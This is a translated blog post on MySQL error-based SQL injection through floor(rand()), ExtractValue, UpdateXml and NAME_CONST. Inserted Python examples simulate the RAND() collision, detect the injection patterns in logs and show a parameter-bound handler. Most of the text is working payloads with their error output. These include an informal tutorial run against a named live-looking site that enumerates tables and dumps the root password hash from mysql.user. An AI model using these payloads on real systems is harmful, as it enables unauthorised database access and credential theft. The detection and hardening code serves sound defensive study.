
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Triggering errors with floor()

Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:

First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace the version() call with the sub-query of interest; for example, to read the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
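Why the floor(rand(0)*2) trick above ends in ERROR 1062, and why it needs at least three source rows, is easier to see with a small model. The following Python is an explanatory example added here; it is not code from the original post. It reimplements the linear recurrence behind MySQL's RAND() with the seeds the server uses for RAND(0), and a deliberately simplified model of how GROUP BY fills its temporary table: the key is evaluated once to look the group up and, when the group is new, evaluated a second time as the row is stored. The dict standing in for the temporary table and the version-string prefix are constructed for the example.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's my_rnd() recurrence


class MySQLRand:
    """Model of MySQL's RAND(seed) stream.

    The server seeds RAND(N) with
        seed1 = N * 0x10001 + 55555555,  seed2 = N * 0x10000001
    so RAND(0) always starts from (55555555, 0) and is fully deterministic,
    which is what makes the 0/1 pattern of floor(rand(0)*2) predictable.
    """

    def __init__(self, seed: int = 0) -> None:
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_bits(n: int) -> list[int]:
    """First n values of floor(rand(0)*2): the 0/1 suffix appended to each group key."""
    rng = MySQLRand(0)
    return [math.floor(rng.rand() * 2) for _ in range(n)]


def simulate_group_by(row_count: int, prefix: str = "5.1.33-community-log"):
    """Simplified model of GROUP BY concat(prefix, floor(rand(0)*2)) over row_count rows.

    For each source row the key is computed and looked up in the temporary
    table. A new group is inserted with the key computed again (rand() advances
    both times). Returns the key whose second insertion would raise
    "Duplicate entry ... for key 'group_key'", or None if no conflict occurs.
    The prefix is a constructed stand-in for version(); the model is a simplification.
    """
    rng = MySQLRand(0)
    groups: dict[str, int] = {}  # the temporary table: key -> count(*)
    for _ in range(row_count):
        lookup_key = prefix + str(math.floor(rng.rand() * 2))
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = prefix + str(math.floor(rng.rand() * 2))  # re-evaluated on insert
        if insert_key in groups:
            return insert_key
        groups[insert_key] = 1
    return None


if __name__ == "__main__":
    print(floor_rand0_bits(7))    # the fixed RAND(0) pattern 0,1,1,0,1,1,0
    print(simulate_group_by(2))   # None: two rows never collide
    print(simulate_group_by(3))   # the key from the ERROR 1062 transcript above
```

The third row is where the collision happens: row 1 looks up "...0", finds nothing and is stored as "...1"; row 2 looks up "...1" and is counted; row 3 looks up "...0", finds nothing, and tries to store "...1" again. Any table with at least three rows (information_schema.tables in the payloads above) is therefore enough.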

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
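All three techniques leave two traces a defender can alert on: the injected function calls in the request, and the MySQL error text in the response when the application echoes database errors back to the client. The following Python is an added example (not code from the original post) that scans access-log lines in the common combined format for the request-side indicators and checks response bodies for the error fingerprints seen in the transcripts above. The log lines, IP addresses and response texts are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators: the function calls the three techniques rely on.
# Matching is done after URL-decoding, so %20 and '+' both become spaces.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
REQUEST_PATTERNS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# Response-side indicators: the error strings each technique provokes. The
# capture group is the data the error message carries out of the database.
RESPONSE_PATTERNS = {
    "dup_entry_group_key": re.compile(r"Duplicate entry '(.*?)' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '(.*?)'"),
    "dup_column_name": re.compile(r"Duplicate column name '(.*?)'"),
}

# Combined log format: client ident user [time] "METHOD PATH PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def classify_request(path: str) -> list[str]:
    """Return the indicator tags that fire on one request path."""
    decoded = unquote_plus(path)
    tags = []
    if FLOOR_RAND.search(decoded) and GROUP_BY.search(decoded):
        tags.append("floor_rand_groupby")
    tags.extend(tag for tag, pat in REQUEST_PATTERNS.items() if pat.search(decoded))
    return tags


def classify_response(body: str):
    """Return (tag, leaked_fragment) for the first error fingerprint in a response, else None."""
    for tag, pat in RESPONSE_PATTERNS.items():
        m = pat.search(body)
        if m:
            return tag, m.group(1)
    return None


def scan_access_log(lines):
    """Return one finding per log line whose request path carries an indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        client, ts, method, path, status, _size = m.groups()
        tags = classify_request(path)
        if tags:
            findings.append({"client": client, "time": ts, "method": method,
                             "status": int(status), "path": path, "tags": tags})
    return findings


# Constructed sample data: two benign requests and one probe per technique.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 231',
    '203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:03:49 +0800] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 203',
    '198.51.100.7 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=2 HTTP/1.1" 200 498',
]
SAMPLE_RESPONSE = "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["client"], finding["status"], finding["tags"])
    print(classify_response(SAMPLE_RESPONSE))
```

The response-side check is the more valuable of the two in practice: the request patterns can be varied by the sender, but a 500 response whose body matches one of these fingerprints is direct evidence that the application is returning raw MySQL errors, which is the condition every technique on this page depends on.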


Further collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
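Every transcript on this page has the same root cause: an id parameter spliced into SQL text, and the database's own error message returned to the client. The following Python is an added example, not code from the post or from any site it mentions. It shows the vulnerable string-building pattern next to a hardened handler that whitelists the parameter, binds it as a query parameter and keeps database error detail in the server log rather than the response. The in-memory SQLite table shaped like the article table above, its row, and the probe value are constructed for the example.

```python
import logging
import sqlite3

log = logging.getLogger("article")


def build_query_vulnerable(raw_id: str) -> str:
    """The pattern the transcripts exploit: untrusted input pasted into SQL text."""
    return f"select * from article where id = {raw_id}"


def parse_article_id(raw_id: str) -> int:
    """Whitelist: ASCII decimal digits only, bounded length. Anything else is rejected."""
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 9:
        raise ValueError("id must be a positive decimal integer")
    return int(raw_id)


def fetch_article(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Hardened handler: validate, bind as a parameter, never echo the DB error."""
    try:
        article_id = parse_article_id(raw_id)
    except ValueError:
        return {"status": 400, "body": "invalid request"}
    try:
        row = conn.execute(
            "select id, title, content from article where id = ?", (article_id,)
        ).fetchone()
    except sqlite3.Error as exc:
        # Detail goes to the server log for the operator. The client gets a fixed
        # string, so an error message can never carry data out of the database.
        log.error("article lookup failed: %s", exc)
        return {"status": 500, "body": "internal error"}
    if row is None:
        return {"status": 404, "body": "not found"}
    return {"status": 200, "body": {"id": row[0], "title": row[1], "content": row[2]}}


def make_demo_db(with_table: bool = True) -> sqlite3.Connection:
    """Constructed database matching the page's article example (or an empty one)."""
    conn = sqlite3.connect(":memory:")
    if with_table:
        conn.execute("create table article (id integer primary key, title text, content text)")
        conn.execute("insert into article values (1, 'test', 'do it')")
    return conn


# Constructed probe value in the shape of the ExtractValue payload above.
PROBE = "1 and extractvalue(1, concat(0x5c,(select user())))"

if __name__ == "__main__":
    conn = make_demo_db()
    print(build_query_vulnerable(PROBE))  # the probe becomes part of the statement
    print(fetch_article(conn, "1"))       # 200 with the article
    print(fetch_article(conn, PROBE))     # 400, rejected before any SQL runs
```

The whitelist alone would stop every payload on this page, since none of them is a bare integer, but it is the parameter binding that removes the vulnerability class, and the generic error response that removes the error-based channel even for queries that do fail.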